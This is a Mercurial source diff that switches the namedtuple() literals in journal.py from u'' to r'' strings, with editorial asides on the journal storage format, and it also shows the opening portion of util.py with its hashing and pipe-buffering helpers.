global: use raw strings for namedtuple()...
Gregory Szorc
r42000:7f63ec69 default
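The change itself is small: the two namedtuple() literals in journal.py switch from u'' to r'' prefixes (see the marked lines in the first hunk below). As a hedged illustration of why raw strings are the convenient choice, assuming Mercurial's usual convention that its Python 3 source transformer rewrites unprefixed string literals to bytes while leaving prefixed literals untouched, an r'' literal is a native str on both Python 2 and Python 3, which is what collections.namedtuple() expects for its type and field names. A minimal standalone sketch (editor's illustration, not code from the diff):

import collections

# r'...' stays a native str under both Python 2 and Python 3 (and is left
# alone by a source transformer that only rewrites unprefixed literals),
# so the field names reach namedtuple() as str rather than bytes.
journalentry = collections.namedtuple(
    r'journalentry',
    r'timestamp user command namespace name oldhashes newhashes')

entry = journalentry(
    timestamp=(0.0, 0), user='alice', command='commit', namespace='bookmark',
    name='feature', oldhashes=('0' * 40,), newhashes=('f' * 40,))
print(entry.name)   # -> feature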
@@ -1,527 +1,527 @@
1 1 # journal.py
2 2 #
3 3 # Copyright 2014-2016 Facebook, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 """track previous positions of bookmarks (EXPERIMENTAL)
8 8
9 9 This extension adds a new command: `hg journal`, which shows you where
10 10 bookmarks were previously located.
11 11
12 12 """
13 13
14 14 from __future__ import absolute_import
15 15
16 16 import collections
17 17 import errno
18 18 import os
19 19 import weakref
20 20
21 21 from mercurial.i18n import _
22 22
23 23 from mercurial import (
24 24 bookmarks,
25 25 cmdutil,
26 26 dispatch,
27 27 encoding,
28 28 error,
29 29 extensions,
30 30 hg,
31 31 localrepo,
32 32 lock,
33 33 logcmdutil,
34 34 node,
35 35 pycompat,
36 36 registrar,
37 37 util,
38 38 )
39 39 from mercurial.utils import (
40 40 dateutil,
41 41 procutil,
42 42 stringutil,
43 43 )
44 44
45 45 cmdtable = {}
46 46 command = registrar.command(cmdtable)
47 47
48 48 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
49 49 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
50 50 # be specifying the version(s) of Mercurial they are tested with, or
51 51 # leave the attribute unspecified.
52 52 testedwith = 'ships-with-hg-core'
53 53
54 54 # storage format version; increment when the format changes
55 55 storageversion = 0
56 56
57 57 # namespaces
58 58 bookmarktype = 'bookmark'
59 59 wdirparenttype = 'wdirparent'
60 60 # In a shared repository, what shared feature name is used
61 61 # to indicate this namespace is shared with the source?
62 62 sharednamespaces = {
63 63 bookmarktype: hg.sharedbookmarks,
64 64 }
65 65
66 66 # Journal recording, register hooks and storage object
67 67 def extsetup(ui):
68 68 extensions.wrapfunction(dispatch, 'runcommand', runcommand)
69 69 extensions.wrapfunction(bookmarks.bmstore, '_write', recordbookmarks)
70 70 extensions.wrapfilecache(
71 71 localrepo.localrepository, 'dirstate', wrapdirstate)
72 72 extensions.wrapfunction(hg, 'postshare', wrappostshare)
73 73 extensions.wrapfunction(hg, 'copystore', unsharejournal)
74 74
75 75 def reposetup(ui, repo):
76 76 if repo.local():
77 77 repo.journal = journalstorage(repo)
78 78 repo._wlockfreeprefix.add('namejournal')
79 79
80 80 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
81 81 if cached:
82 82 # already instantiated dirstate isn't yet marked as
83 83 # "journal"-ing, even though repo.dirstate() was already
84 84 # wrapped by our own wrapdirstate()
85 85 _setupdirstate(repo, dirstate)
86 86
87 87 def runcommand(orig, lui, repo, cmd, fullargs, *args):
88 88 """Track the command line options for recording in the journal"""
89 89 journalstorage.recordcommand(*fullargs)
90 90 return orig(lui, repo, cmd, fullargs, *args)
91 91
92 92 def _setupdirstate(repo, dirstate):
93 93 dirstate.journalstorage = repo.journal
94 94 dirstate.addparentchangecallback('journal', recorddirstateparents)
95 95
96 96 # hooks to record dirstate changes
97 97 def wrapdirstate(orig, repo):
98 98 """Make journal storage available to the dirstate object"""
99 99 dirstate = orig(repo)
100 100 if util.safehasattr(repo, 'journal'):
101 101 _setupdirstate(repo, dirstate)
102 102 return dirstate
103 103
104 104 def recorddirstateparents(dirstate, old, new):
105 105 """Records all dirstate parent changes in the journal."""
106 106 old = list(old)
107 107 new = list(new)
108 108 if util.safehasattr(dirstate, 'journalstorage'):
109 109 # only record two hashes if there was a merge
110 110 oldhashes = old[:1] if old[1] == node.nullid else old
111 111 newhashes = new[:1] if new[1] == node.nullid else new
112 112 dirstate.journalstorage.record(
113 113 wdirparenttype, '.', oldhashes, newhashes)
114 114
115 115 # hooks to record bookmark changes (both local and remote)
116 116 def recordbookmarks(orig, store, fp):
117 117 """Records all bookmark changes in the journal."""
118 118 repo = store._repo
119 119 if util.safehasattr(repo, 'journal'):
120 120 oldmarks = bookmarks.bmstore(repo)
121 121 for mark, value in store.iteritems():
122 122 oldvalue = oldmarks.get(mark, node.nullid)
123 123 if value != oldvalue:
124 124 repo.journal.record(bookmarktype, mark, oldvalue, value)
125 125 return orig(store, fp)
126 126
127 127 # shared repository support
128 128 def _readsharedfeatures(repo):
129 129 """A set of shared features for this repository"""
130 130 try:
131 131 return set(repo.vfs.read('shared').splitlines())
132 132 except IOError as inst:
133 133 if inst.errno != errno.ENOENT:
134 134 raise
135 135 return set()
136 136
137 137 def _mergeentriesiter(*iterables, **kwargs):
138 138 """Given a set of sorted iterables, yield the next entry in merged order
139 139
140 140 Note that by default entries go from most recent to oldest.
141 141 """
142 142 order = kwargs.pop(r'order', max)
143 143 iterables = [iter(it) for it in iterables]
144 144 # this tracks still active iterables; iterables are deleted as they are
145 145 # exhausted, which is why this is a dictionary and why each entry also
146 146 # stores the key. Entries are mutable so we can store the next value each
147 147 # time.
148 148 iterable_map = {}
149 149 for key, it in enumerate(iterables):
150 150 try:
151 151 iterable_map[key] = [next(it), key, it]
152 152 except StopIteration:
153 153 # empty entry, can be ignored
154 154 pass
155 155
156 156 while iterable_map:
157 157 value, key, it = order(iterable_map.itervalues())
158 158 yield value
159 159 try:
160 160 iterable_map[key][0] = next(it)
161 161 except StopIteration:
162 162 # this iterable is empty, remove it from consideration
163 163 del iterable_map[key]
164 164
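# Editor's sketch (not part of this changeset): how _mergeentriesiter() above
# merges already-sorted inputs. With the default order=max it always yields
# the largest remaining head, i.e. newest-first when each input is sorted
# newest-first; unsharejournal() below passes order=min to copy oldest-first.
# Plain integers stand in for journal entries, and since the function body
# uses .itervalues(), this illustration assumes the Python 2 / source-
# transformed environment the module targets.
def _mergeentriesiter_example():
    local = [9, 7, 3]   # hypothetical timestamps, newest first
    shared = [8, 4]
    assert list(_mergeentriesiter(local, shared)) == [9, 8, 7, 4, 3]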
165 165 def wrappostshare(orig, sourcerepo, destrepo, **kwargs):
166 166 """Mark this shared working copy as sharing journal information"""
167 167 with destrepo.wlock():
168 168 orig(sourcerepo, destrepo, **kwargs)
169 169 with destrepo.vfs('shared', 'a') as fp:
170 170 fp.write('journal\n')
171 171
172 172 def unsharejournal(orig, ui, repo, repopath):
173 173 """Copy shared journal entries into this repo when unsharing"""
174 174 if (repo.path == repopath and repo.shared() and
175 175 util.safehasattr(repo, 'journal')):
176 176 sharedrepo = hg.sharedreposource(repo)
177 177 sharedfeatures = _readsharedfeatures(repo)
178 178 if sharedrepo and sharedfeatures > {'journal'}:
179 179 # there is a shared repository and there are shared journal entries
180 180 # to copy. move shared data over from source to destination but
181 181 # move the local file first
182 182 if repo.vfs.exists('namejournal'):
183 183 journalpath = repo.vfs.join('namejournal')
184 184 util.rename(journalpath, journalpath + '.bak')
185 185 storage = repo.journal
186 186 local = storage._open(
187 187 repo.vfs, filename='namejournal.bak', _newestfirst=False)
188 188 shared = (
189 189 e for e in storage._open(sharedrepo.vfs, _newestfirst=False)
190 190 if sharednamespaces.get(e.namespace) in sharedfeatures)
191 191 for entry in _mergeentriesiter(local, shared, order=min):
192 192 storage._write(repo.vfs, entry)
193 193
194 194 return orig(ui, repo, repopath)
195 195
196 196 class journalentry(collections.namedtuple(
197 - u'journalentry',
198 - u'timestamp user command namespace name oldhashes newhashes')):
197 + r'journalentry',
198 + r'timestamp user command namespace name oldhashes newhashes')):
199 199 """Individual journal entry
200 200
201 201 * timestamp: a mercurial (time, timezone) tuple
202 202 * user: the username that ran the command
203 203 * namespace: the entry namespace, an opaque string
204 204 * name: the name of the changed item, opaque string with meaning in the
205 205 namespace
206 206 * command: the hg command that triggered this record
207 207 * oldhashes: a tuple of one or more binary hashes for the old location
208 208 * newhashes: a tuple of one or more binary hashes for the new location
209 209
210 210 Handles serialisation from and to the storage format. Fields are
211 211 separated by newlines, hashes are written out in hex separated by commas,
212 212 timestamp and timezone are separated by a space.
213 213
214 214 """
215 215 @classmethod
216 216 def fromstorage(cls, line):
217 217 (time, user, command, namespace, name,
218 218 oldhashes, newhashes) = line.split('\n')
219 219 timestamp, tz = time.split()
220 220 timestamp, tz = float(timestamp), int(tz)
221 221 oldhashes = tuple(node.bin(hash) for hash in oldhashes.split(','))
222 222 newhashes = tuple(node.bin(hash) for hash in newhashes.split(','))
223 223 return cls(
224 224 (timestamp, tz), user, command, namespace, name,
225 225 oldhashes, newhashes)
226 226
227 227 def __bytes__(self):
228 228 """bytes representation for storage"""
229 229 time = ' '.join(map(pycompat.bytestr, self.timestamp))
230 230 oldhashes = ','.join([node.hex(hash) for hash in self.oldhashes])
231 231 newhashes = ','.join([node.hex(hash) for hash in self.newhashes])
232 232 return '\n'.join((
233 233 time, self.user, self.command, self.namespace, self.name,
234 234 oldhashes, newhashes))
235 235
236 236 __str__ = encoding.strmethod(__bytes__)
237 237
238 238 class journalstorage(object):
239 239 """Storage for journal entries
240 240
241 241 Entries are divided over two files; one with entries that pertain to the
242 242 local working copy *only*, and one with entries that are shared across
243 243 multiple working copies when shared using the share extension.
244 244
245 245 Entries are stored with NUL bytes as separators. See the journalentry
246 246 class for the per-entry structure.
247 247
248 248 The file format starts with an integer version, delimited by a NUL.
249 249
250 250 This storage uses a dedicated lock; this makes it easier to avoid issues
251 251 with adding entries that are added when the regular wlock is unlocked (e.g.
252 252 the dirstate).
253 253
254 254 """
255 255 _currentcommand = ()
256 256 _lockref = None
257 257
258 258 def __init__(self, repo):
259 259 self.user = procutil.getuser()
260 260 self.ui = repo.ui
261 261 self.vfs = repo.vfs
262 262
263 263 # is this working copy using a shared storage?
264 264 self.sharedfeatures = self.sharedvfs = None
265 265 if repo.shared():
266 266 features = _readsharedfeatures(repo)
267 267 sharedrepo = hg.sharedreposource(repo)
268 268 if sharedrepo is not None and 'journal' in features:
269 269 self.sharedvfs = sharedrepo.vfs
270 270 self.sharedfeatures = features
271 271
272 272 # track the current command for recording in journal entries
273 273 @property
274 274 def command(self):
275 275 commandstr = ' '.join(
276 276 map(procutil.shellquote, journalstorage._currentcommand))
277 277 if '\n' in commandstr:
278 278 # truncate multi-line commands
279 279 commandstr = commandstr.partition('\n')[0] + ' ...'
280 280 return commandstr
281 281
282 282 @classmethod
283 283 def recordcommand(cls, *fullargs):
284 284 """Set the current hg arguments, stored with recorded entries"""
285 285 # Set the current command on the class because we may have started
286 286 # with a non-local repo (cloning for example).
287 287 cls._currentcommand = fullargs
288 288
289 289 def _currentlock(self, lockref):
290 290 """Returns the lock if it's held, or None if it's not.
291 291
292 292 (This is copied from the localrepo class)
293 293 """
294 294 if lockref is None:
295 295 return None
296 296 l = lockref()
297 297 if l is None or not l.held:
298 298 return None
299 299 return l
300 300
301 301 def jlock(self, vfs):
302 302 """Create a lock for the journal file"""
303 303 if self._currentlock(self._lockref) is not None:
304 304 raise error.Abort(_('journal lock does not support nesting'))
305 305 desc = _('journal of %s') % vfs.base
306 306 try:
307 307 l = lock.lock(vfs, 'namejournal.lock', 0, desc=desc)
308 308 except error.LockHeld as inst:
309 309 self.ui.warn(
310 310 _("waiting for lock on %s held by %r\n") % (desc, inst.locker))
311 311 # default to 600 seconds timeout
312 312 l = lock.lock(
313 313 vfs, 'namejournal.lock',
314 314 self.ui.configint("ui", "timeout"), desc=desc)
315 315 self.ui.warn(_("got lock after %s seconds\n") % l.delay)
316 316 self._lockref = weakref.ref(l)
317 317 return l
318 318
319 319 def record(self, namespace, name, oldhashes, newhashes):
320 320 """Record a new journal entry
321 321
322 322 * namespace: an opaque string; this can be used to filter on the type
323 323 of recorded entries.
324 324 * name: the name defining this entry; for bookmarks, this is the
325 325 bookmark name. Can be filtered on when retrieving entries.
326 326 * oldhashes and newhashes: each a single binary hash, or a list of
327 327 binary hashes. These represent the old and new position of the named
328 328 item.
329 329
330 330 """
331 331 if not isinstance(oldhashes, list):
332 332 oldhashes = [oldhashes]
333 333 if not isinstance(newhashes, list):
334 334 newhashes = [newhashes]
335 335
336 336 entry = journalentry(
337 337 dateutil.makedate(), self.user, self.command, namespace, name,
338 338 oldhashes, newhashes)
339 339
340 340 vfs = self.vfs
341 341 if self.sharedvfs is not None:
342 342 # write to the shared repository if this feature is being
343 343 # shared between working copies.
344 344 if sharednamespaces.get(namespace) in self.sharedfeatures:
345 345 vfs = self.sharedvfs
346 346
347 347 self._write(vfs, entry)
348 348
349 349 def _write(self, vfs, entry):
350 350 with self.jlock(vfs):
351 351 # open file in append mode to ensure it is created if missing
352 352 with vfs('namejournal', mode='a+b') as f:
353 353 f.seek(0, os.SEEK_SET)
354 354 # Read just enough bytes to get a version number (up to 2
355 355 # digits plus separator)
356 356 version = f.read(3).partition('\0')[0]
357 357 if version and version != "%d" % storageversion:
358 358 # different version of the storage. Exit early (and not
359 359 # write anything) if this is not a version we can handle or
360 360 # the file is corrupt. In future, perhaps rotate the file
361 361 # instead?
362 362 self.ui.warn(
363 363 _("unsupported journal file version '%s'\n") % version)
364 364 return
365 365 if not version:
366 366 # empty file, write version first
367 367 f.write(("%d" % storageversion) + '\0')
368 368 f.seek(0, os.SEEK_END)
369 369 f.write(bytes(entry) + '\0')
370 370
371 371 def filtered(self, namespace=None, name=None):
372 372 """Yield all journal entries with the given namespace or name
373 373
374 374 Both the namespace and the name are optional; if neither is given all
375 375 entries in the journal are produced.
376 376
377 377 Matching supports regular expressions by using the `re:` prefix
378 378 (use `literal:` to match names or namespaces that start with `re:`)
379 379
380 380 """
381 381 if namespace is not None:
382 382 namespace = stringutil.stringmatcher(namespace)[-1]
383 383 if name is not None:
384 384 name = stringutil.stringmatcher(name)[-1]
385 385 for entry in self:
386 386 if namespace is not None and not namespace(entry.namespace):
387 387 continue
388 388 if name is not None and not name(entry.name):
389 389 continue
390 390 yield entry
391 391
392 392 def __iter__(self):
393 393 """Iterate over the storage
394 394
395 395 Yields journalentry instances for each contained journal record.
396 396
397 397 """
398 398 local = self._open(self.vfs)
399 399
400 400 if self.sharedvfs is None:
401 401 return local
402 402
403 403 # iterate over both local and shared entries, but only those
404 404 # shared entries that are among the currently shared features
405 405 shared = (
406 406 e for e in self._open(self.sharedvfs)
407 407 if sharednamespaces.get(e.namespace) in self.sharedfeatures)
408 408 return _mergeentriesiter(local, shared)
409 409
410 410 def _open(self, vfs, filename='namejournal', _newestfirst=True):
411 411 if not vfs.exists(filename):
412 412 return
413 413
414 414 with vfs(filename) as f:
415 415 raw = f.read()
416 416
417 417 lines = raw.split('\0')
418 418 version = lines and lines[0]
419 419 if version != "%d" % storageversion:
420 420 version = version or _('not available')
421 421 raise error.Abort(_("unknown journal file version '%s'") % version)
422 422
423 423 # Skip the first line, it's a version number. Normally we iterate over
424 424 # these in reverse order to list newest first; only when copying across
425 425 # a shared storage do we forgo reversing.
426 426 lines = lines[1:]
427 427 if _newestfirst:
428 428 lines = reversed(lines)
429 429 for line in lines:
430 430 if not line:
431 431 continue
432 432 yield journalentry.fromstorage(line)
433 433
434 434 # journal reading
435 435 # log options that don't make sense for journal
436 436 _ignoreopts = ('no-merges', 'graph')
437 437 @command(
438 438 'journal', [
439 439 ('', 'all', None, 'show history for all names'),
440 440 ('c', 'commits', None, 'show commit metadata'),
441 441 ] + [opt for opt in cmdutil.logopts if opt[1] not in _ignoreopts],
442 442 '[OPTION]... [BOOKMARKNAME]',
443 443 helpcategory=command.CATEGORY_CHANGE_ORGANIZATION)
444 444 def journal(ui, repo, *args, **opts):
445 445 """show the previous position of bookmarks and the working copy
446 446
447 447 The journal is used to see the previous commits that bookmarks and the
448 448 working copy pointed to. By default the previous locations of the working
449 449 copy are shown. Passing a bookmark name will show all the previous positions of
450 450 that bookmark. Use the --all switch to show previous locations for all
451 451 bookmarks and the working copy; each line will then include the bookmark
452 452 name, or '.' for the working copy, as well.
453 453
454 454 If `name` starts with `re:`, the remainder of the name is treated as
455 455 a regular expression. To match a name that actually starts with `re:`,
456 456 use the prefix `literal:`.
457 457
458 458 By default hg journal only shows the commit hash and the command that was
459 459 running at that time. -v/--verbose will show the prior hash, the user, and
460 460 the time at which it happened.
461 461
462 462 Use -c/--commits to output log information on each commit hash; at this
463 463 point you can use the usual `--patch`, `--git`, `--stat` and `--template`
464 464 switches to alter the log output for these.
465 465
466 466 `hg journal -T json` can be used to produce machine readable output.
467 467
468 468 """
469 469 opts = pycompat.byteskwargs(opts)
470 470 name = '.'
471 471 if opts.get('all'):
472 472 if args:
473 473 raise error.Abort(
474 474 _("You can't combine --all and filtering on a name"))
475 475 name = None
476 476 if args:
477 477 name = args[0]
478 478
479 479 fm = ui.formatter('journal', opts)
480 480 def formatnodes(nodes):
481 481 return fm.formatlist(map(fm.hexfunc, nodes), name='node', sep=',')
482 482
483 483 if opts.get("template") != "json":
484 484 if name is None:
485 485 displayname = _('the working copy and bookmarks')
486 486 else:
487 487 displayname = "'%s'" % name
488 488 ui.status(_("previous locations of %s:\n") % displayname)
489 489
490 490 limit = logcmdutil.getlimit(opts)
491 491 entry = None
492 492 ui.pager('journal')
493 493 for count, entry in enumerate(repo.journal.filtered(name=name)):
494 494 if count == limit:
495 495 break
496 496
497 497 fm.startitem()
498 498 fm.condwrite(ui.verbose, 'oldnodes', '%s -> ',
499 499 formatnodes(entry.oldhashes))
500 500 fm.write('newnodes', '%s', formatnodes(entry.newhashes))
501 501 fm.condwrite(ui.verbose, 'user', ' %-8s', entry.user)
502 502 fm.condwrite(
503 503 opts.get('all') or name.startswith('re:'),
504 504 'name', ' %-8s', entry.name)
505 505
506 506 fm.condwrite(ui.verbose, 'date', ' %s',
507 507 fm.formatdate(entry.timestamp, '%Y-%m-%d %H:%M %1%2'))
508 508 fm.write('command', ' %s\n', entry.command)
509 509
510 510 if opts.get("commits"):
511 511 if fm.isplain():
512 512 displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
513 513 else:
514 514 displayer = logcmdutil.changesetformatter(
515 515 ui, repo, fm.nested('changesets'), diffopts=opts)
516 516 for hash in entry.newhashes:
517 517 try:
518 518 ctx = repo[hash]
519 519 displayer.show(ctx)
520 520 except error.RepoLookupError as e:
521 521 fm.plain("%s\n\n" % pycompat.bytestr(e))
522 522 displayer.close()
523 523
524 524 fm.end()
525 525
526 526 if entry is None:
527 527 ui.status(_("no recorded locations\n"))
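Before the second hunk, an editor's aside on the storage format that the journalentry and journalstorage docstrings above describe: the file opens with the integer storage version followed by a NUL, entries are NUL-separated, fields within an entry are newline-separated, hashes are written in hex separated by commas, and the timestamp and timezone share one space-separated field. The following is only a reduced sketch of that layout in plain Python; the helper names are hypothetical and this is not code from the diff:

STORAGE_VERSION = 0

def serialize_entry(timestamp, tz, user, command, namespace, name,
                    oldhashes, newhashes):
    # fields separated by newlines; hashes hex-encoded and comma-separated;
    # timestamp and timezone separated by a space
    return '\n'.join([
        '%s %d' % (timestamp, tz), user, command, namespace, name,
        ','.join(oldhashes), ','.join(newhashes)])

def write_journal(entries):
    # the file starts with the integer version, then NUL-terminated entries
    parts = ['%d' % STORAGE_VERSION]
    parts.extend(serialize_entry(*e) for e in entries)
    return '\0'.join(parts) + '\0'

raw = write_journal([(0.0, 0, 'alice', 'hg commit', 'bookmark', 'feature',
                      ('0' * 40,), ('f' * 40,))])
version = raw.partition('\0')[0]
assert version == '%d' % STORAGE_VERSION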
@@ -1,4021 +1,4021 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still has deprecation warnings enabled by default. We do not want
146 146 # to display anything to the standard user, so detect if we are running tests and
147 147 # only use python deprecation warnings in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS thing useless for our use case.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue an python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % key)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class lets us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True is any data is currently buffered
310 310
311 311 This will be used externally as a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
